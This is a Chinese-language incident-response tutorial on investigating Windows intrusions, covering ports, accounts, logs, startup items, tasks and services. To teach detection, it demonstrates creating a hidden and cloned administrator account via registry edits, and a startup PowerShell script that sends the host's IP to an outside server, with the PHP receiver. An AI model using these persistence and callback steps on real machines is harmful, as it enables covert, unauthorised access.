惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

B
Blog
V
Vulnerabilities – Threatpost
P
Proofpoint News Feed
Google DeepMind News
Google DeepMind News
Y
Y Combinator Blog
V
Visual Studio Blog
阮一峰的网络日志
阮一峰的网络日志
腾讯CDC
月光博客
月光博客
T
Troy Hunt's Blog
博客园_首页
H
Hackread – Cybersecurity News, Data Breaches, AI and More
N
Netflix TechBlog - Medium
Microsoft Security Blog
Microsoft Security Blog
Recorded Future
Recorded Future
Blog — PlanetScale
Blog — PlanetScale
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
Scott Helme
Scott Helme
T
Threat Research - Cisco Blogs
P
Palo Alto Networks Blog
T
The Exploit Database - CXSecurity.com
Simon Willison's Weblog
Simon Willison's Weblog
Know Your Adversary
Know Your Adversary
SecWiki News
SecWiki News
Security Archives - TechRepublic
Security Archives - TechRepublic
T
Threatpost
Forbes - Security
Forbes - Security
S
Schneier on Security
P
Proofpoint News Feed
T
Tor Project blog
Cyberwarzone
Cyberwarzone
The Hacker News
The Hacker News
Cloudbric
Cloudbric
S
Security @ Cisco Blogs
Webroot Blog
Webroot Blog
Attack and Defense Labs
Attack and Defense Labs
Hacker News: Ask HN
Hacker News: Ask HN
Google DeepMind News
Google DeepMind News
Hacker News - Newest:
Hacker News - Newest: "LLM"
C
CERT Recently Published Vulnerability Notes
The Last Watchdog
The Last Watchdog
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
S
SegmentFault 最新的问题
V
V2EX
量子位
B
Blog RSS Feed
宝玉的分享
宝玉的分享
T
The Blog of Author Tim Ferriss
罗磊的独立博客
J
Java Code Geeks

卷卷

今日说法 节目汇总笔记 《斯坦福大学人生设计课》读书笔记 我的书单📖 H-worm (VBS蠕虫) 感染事件溯源分析报告 AMOS (Atomic Stealer) 恶意软件深度分析 银狐26年全面复活,对抗强度或已超25年最高水平 Atomic Stealer (AMOS) 回归:ClickFix、伪装加密货币应用与新型 macOS 持久化机制 关于xt.exe的分析报告 仿真钓鱼页面窃取用户凭证 GitHub Pages配置Cloudflare CDN踩坑之路 推荐RSS热力图和Github热力图使用指南 学习逆向工程相关概念 zabbix快速上手 学习python高级语法特性例题笔记 学习云计算基本理论学习笔记 学习Docker-Compose命令及镜像构建与推送 ATT &CK 框架实践阅读笔记 rundll32.exe恶意加载DLL文件外联 《悉达多》读书笔记 《稀缺》读书笔记 《认知觉醒》读书笔记 《营养学》读书笔记 《心理学》读书笔记 热💖生活 C++开发环境配置与程序运行笔记 IDA Free调试Hello World笔记 逆向免杀 Admin.canway账号命名方式 BAS - Breach and Attack Simulation Windows核心系统进程链与svchost深度解析 企业测试环境的弱口令需要整改吗 AI对话笔记-模板 网络安全行业招聘需求与技术能力分析 银狐木马技术原理分析与检测技术 SIEM-安全信息和事件管理 AI笔记 转载 专业备考⏳ 其他杂项🧶 Markdown 原生图片 知道创宇技能表 Prompt越狱手册 deepseek使用指南 清华大学 deepseek提问方法 markdown基本语法 数据湖:它们是什么?为什么您的组织需要一个? GitHub Codespaces velociraptor(迅猛龙)快速上手 学习windows快捷命令 学习常用 150 个Linux命令 软考中的一些概念 学习ssh基本使用 Linux系统换源输入法和包管理器 DC-8靶机 Metasploitable3下载与安装 信息收集方法及流程 防守之道 开发运维 免责声明 密码喷射攻击:防范攻击你需要知道的事项 密码学中的哈希解释:它的工作原理、算法和实际用途 应急响应术语 各种报错积累 漏洞挖掘思路 收藏夹 RDP和360星图使用 Linux入侵排查 Redis日志分析 Linux安全加固 windows安全加固 windows日志ID速查 中间件加固 数据库安全加固 windows系统提权 MySQL注入复盘 学习git版本控制工具的概念与命令 学习Web Shell 学习Linux命令 java环境配置 学习python基础语法特性解题笔记 学习Mysql基础知识 windows权限维持 学习网络及安全的一些术语 PHP代码审计 Linux系统提权 MSSQL注入复盘 Linux权限维持 命令执行和反序列化 逻辑漏洞 upload-labs 框架漏洞 学习PHP语法特性 XXE&SSRF CSRF 文件上传 Google Hacking XSS-lab XSS实验 学习URL请求后的通信过程 FOFA
windows入侵排查
卷卷 · 2024-10-18 · via 卷卷

1、入侵特点

2、走哪里入侵

3、针对性的排查

主要关注:进程、账号、网络活动、启动项目、日志

1、口令、端口

检查:询问管理员、通过注册表;nmap扫描(或者询问管理员的资产台账中的端口信息)

如果能登录服务器:

C:\Users\root>netstat -ano

活动连接

  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       984
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       516
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       776
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1272
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1600
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2708
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       768
  TCP    0.0.0.0:55888          0.0.0.0:0              LISTENING       6112
  TCP    127.0.0.1:53000        0.0.0.0:0              LISTENING       5936
  TCP    192.168.188.128:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.188.128:62482  20.198.162.76:443      ESTABLISHED     3448

2 可疑账号

计算机\HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003E9

注意:要先给SAM文件当前用户的读取权限

2.4 D盾查看是否存在克隆账号、隐藏账号

test$ 隐藏账号

克隆账号和隐藏账号如何创建★必会

1、创建普通隐藏账号

C:\Windows\system32>net user test$ test123 /add
命令成功完成。


C:\Windows\system32>net user

\\DESKTOP-6N9H4HS 的用户帐户

-------------------------------------------------------------------------------
Administrator            DefaultAccount           Guest
root                     WDAGUtilityAccount
命令成功完成。


C:\Windows\system32>

2、导出用户的注册表信息和管理员注册表信息

image

image

2.1 先创建隐藏用户

  1. 2导出注册表

修改user-test.reg中的F=hex:后的内内容位admin.reg的内容

image

删除影藏账号test$

导入克隆的账号和Names导出的文件

C:\Windows\system32>net user test$ /del
命令成功完成。

C:\Windows\system32>regedit /s C:\Users\root\Desktop\names-test.reg

C:\Windows\system32>regedit /s C:\Users\root\Desktop\user-test.reg

查看是否导入成功:

image

删除方式:

1 D盾直接删除

2 去注册表内删除

3 查看日志

结合登录时间、用户行为、明确账号是否有问题

重点关注的日志:

windows事件ID事件类型描述
4624用户成功登录所有用户
4625登陆失败所有用户0
4634退出登录
4656 4658 4659 4660 4661 4662 4663 4664对象访问当访问给定对象(文件、目录等)访问的类型(读、写、删),成功或失败的行为及用户
4720 4722 4723 4724 4725 4726 4738 4740用户改变账号改变:创建、删除、改密码
4627-4637 4739-4762用户组改变对一个用户在的所有改变行为:添加、移除等
4768 4776成功账号验证
4771 4777失败账号验证
4778 4779主机会话状态包括会话链接和断开

快速检查的工具

image

4、检查端口、进程

4.1 查看端口链接状况

C:\Users\root>netstat -ano

活动连接

  协议  本地地址          外部地址        状态           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       984
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:5040           0.0.0.0:0              LISTENING       516
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING       776
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING       628
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING       1272
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING       1600
  TCP    0.0.0.0:49668          0.0.0.0:0              LISTENING       2708
  TCP    0.0.0.0:49669          0.0.0.0:0              LISTENING       768
  TCP    0.0.0.0:55888          0.0.0.0:0              LISTENING       6112
  TCP    127.0.0.1:53000        0.0.0.0:0              LISTENING       5936
  TCP    192.168.188.128:139    0.0.0.0:0              LISTENING       4
  TCP    192.168.188.128:62482  20.198.162.76:443      ESTABLISHED     3448
  TCP    192.168.188.128:62661  14.22.7.190:80         ESTABLISHED     2716
  TCP    192.168.188.128:62662  118.112.238.199:80     ESTABLISHED     2716

4.2 针对 LISTENING状态的,如果看着比较陌生,使用tasklist跟进PID

C:\Users\root>tasklist | findstr 516
sihost.exe                    5780 Console                    1     30,516 K
ctfmon.exe                    5160 Console                    1     32,032 K
svchost.exe                    516 Services                   0     20,684 K

4.3 任务管理器查看

重点关注外联:

结合火绒剑和netstat -ano的外联IP,进行关联分析:

image

结合蓝队分析工具:

image

5 启动项目

注册表中查看启动项1

计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

计算机\HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce

注册表中查看启动项2

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

计算机\HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runonce

msconfig系统配置查看部分移动到了任务管理器

安装的安全防护软件

如:360 火绒的启动管理

程序-启动文件夹

5.4 老版本的windwos,在程序-启动文件夹中会存在部分自启动程序,路径如下:

C:\ProgramData\Microsoft\Windows\Start Menu/Programs/Startup

C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu/Programs/Startup

开关机脚本

在本地组策略编辑器内,打开方式:gpedit.msc

关注其中的开机脚本和关机脚本

本地组策略编辑器-->计算机配置-->windwos设置--->脚本(启动/关机)

本地组策略编辑器-->用户配置-->windows设置-->脚本(登录/注销)

1、创建隐藏账号和克隆账号

2、搞个开机脚本

客户端

image

line.ps1

# 获取本地 IP 地址,排除回环地址  
$ipAddresses = Get-NetIPAddress -InterfaceAlias "*" -AddressFamily IPv4 | Where-Object { $_.AddressState -eq "Preferred" -and $_.InterfaceAlias -notlike "*Loopback Pseudo-Interface*" }  
  
# 选择第一个 IP 地址  
$clientIp = $ipAddresses[0].IPAddress  
echo $clientIp
# 服务器的 URL(替换为您的服务器地址和 PHP 脚本路径)  
$serverUrl = "http://47.113.187.190:90/line.php"  
  
# 发送 HTTP POST 请求  
Invoke-RestMethod -Uri $serverUrl -Method Post -Body ip=$clientIp
@echo off  
powershell -File "C:\Users\Anonymous\Desktop\line.ps1"

gpedit.msc

image

服务器端

line.php

<?php  
// 检查是否收到了 POST 请求  
if ($_SERVER['REQUEST_METHOD'] === 'POST') {  
    // 获取 POST 数据中的 IP 地址  
    $ip = isset($_POST['ip']) ? $_POST['ip'] : null;  
  
    // 验证 IP 地址(可选,但推荐)  
    if (filter_var($ip, FILTER_VALIDATE_IP)) {  
        // 记录 IP 地址到日志文件  
        $log_file = 'line_ip_log.txt';  
        $client_ip = $_SERVER['REMOTE_ADDR'];  
        $log_entry = date('Y-m-d H:i:s') . " - Received IP: $ip" . " - client IP: $client_ip\n";  
        file_put_contents($log_file, $log_entry, FILE_APPEND);  
  
        // 返回成功响应  
        echo "IP logged successfully";  
    } else {  
        // 返回错误响应  
        http_response_code(400);  
        echo "Invalid IP address";  
    }  
} else {  
    // 如果不是 POST 请求,则返回错误响应  
    http_response_code(405);  
    echo "Method Not Allowed";  
}  
?>

image

2024-10-18 13:32:10 - Received IP: 172.30.144.1 - client IP: 171.223.229.61
2024-10-18 13:37:57 - Received IP: 172.30.144.1 - client IP: 171.223.229.61
2024-10-18 13:38:05 - Received IP: 172.30.144.1 - client IP: 171.223.229.61
2024-10-18 13:38:24 - Received IP: 172.30.144.1 - client IP: 171.223.229.61
2024-10-18 13:42:33 - Received IP: 172.29.240.1 - client IP: 171.223.229.61
2024-10-18 13:46:09 - Received IP: 192.168.64.1 - client IP: 171.223.229.61
2024-10-18 13:55:07 - Received IP: 192.168.56.1 - client IP: 171.223.229.61

6 计划任务(自启动相关)

6.1 查看系统计划任务列表:

C:\Users\root>schtasks  > ./Desktop/1.txt

C:\Users\root>at        #注意在windwos10以上已经禁用
AT 命令已弃用。请改用 schtasks.exe。

不支持该请求。

C:\Users\root>

就绪:已禁用:正在运行 三种结果,需要关注正在运行和就绪的计划任务

6.2 关注就绪的计划任务列表

image

6.3 通过taskschd.msc查看计划任务

通过管理工具-计划任务程序查看计划任务

关注:就绪任务的类型和触发器

image

6.4 第三方杀毒软件查看计划任务

关闭方法1:

image

如果在计划任务程序查不到,使用命令行关闭2: at命令

image

7 服务(关注自启动的)

services.msc打开

任务管理器打开

image

需要关注自启动、延时启动的服务,查看是否有可疑的服务

image

火绒剑内查看相关的恶意未知服务,或者可疑服务

image

8 检查系统相关信息

使用命令查看系统线管信息

image

查看os对应的版本一些补丁有没有安装

9 可疑文件

windwos10用户:

%UserProfile%\Recent路径下存储最近编辑过的文件,检查最近更过过的文件;重点关注webshell

image

windwos其他版本如xp或者老版本:

C:\Documents and Settings

windows10:

%UserProfile%\AppData\Roaming\Microsoft\Windows\Recent最近使用的项目

webshell、恶意文件查杀

D盾查杀

河马查杀:在线或者离线

安全狗(网站、服务器)免费

本地查杀产品:360、火绒、腾讯安全管家、卡巴斯基、大蜘蛛

在线杀毒

病毒动态:微步、安全厂商(深信服、360、奇安信)、freebuf论坛、先知社区、

国家信息安全漏洞库:https://www.cnnvd.org.cn

国家计算机病毒应急处理中心:https://www.cverc.org.cn/